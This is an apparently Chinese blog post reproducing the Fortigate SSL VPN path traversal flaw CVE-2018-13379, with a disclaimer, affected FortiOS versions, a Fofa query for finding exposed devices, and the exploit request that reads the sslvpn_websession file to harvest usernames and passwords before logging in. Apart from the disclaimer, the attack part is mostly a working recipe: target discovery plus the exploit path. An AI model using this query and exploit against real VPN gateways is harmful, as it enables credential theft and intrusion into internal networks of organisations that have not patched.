Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

小胡yhu2023-11-10 22:13

Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。

漏洞影响

Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

漏洞危害

获取敏感信息,造成数据泄露,并且可获取账户密码直通内网

网络测绘

Fofa: body="FortiToken clock drift detected"

漏洞复现

1. 访问链接查看是否存在漏洞

bash 复制代码 
/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

2. 查看用户名密码

3. 登录后台

相关推荐
薛定谔的码*14 分钟前
计算机三级网络技术备考(5)
网络·智能路由器
码叔义24 分钟前
X509TrustManager信任SSL证书
python·网络协议·ssl
网络设计ensp1 小时前
企业网设计
网络·智能路由器
鸭梨山大。1 小时前
linux命令-iptables与firewalld 命令详解
linux·运维·网络
半夏知半秋1 小时前
linux下的网络抓包(tcpdump)介绍
linux·运维·服务器·网络·笔记·学习·tcpdump
奔跑吧邓邓子1 小时前
【商城实战(23)】筑牢安全防线,防范常见漏洞
安全·springboot·uniapp·csrf·element plus·sql注入·商城实战
fatsheep洋1 小时前
全网最详解答OSPF基础
网络·ospf
lsrsyx2 小时前
中信银行太原分行营业部开展“金融知识普及共筑消费安全”宣传活动
安全·金融
Hacker_LaoYi2 小时前
Windows server网络安全
windows·安全·web安全
zzy20887402712 小时前
网络初级复习作业
网络
热门推荐
01如何在WPS和Word/Excel中直接使用DeepSeek功能02DeepSeek各版本说明与优缺点分析03本地部署DeepSeek教程(Mac版本)04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05如何本地部署AI智能体平台,带你手搓一个AI Agent06DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具07DeepSeek RAGFlow构建本地知识库系统08Windows 11 安装 Dify 完整指南 非docker环境09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10组基轨迹建模 GBTM的介绍与实现(Stata 或 R)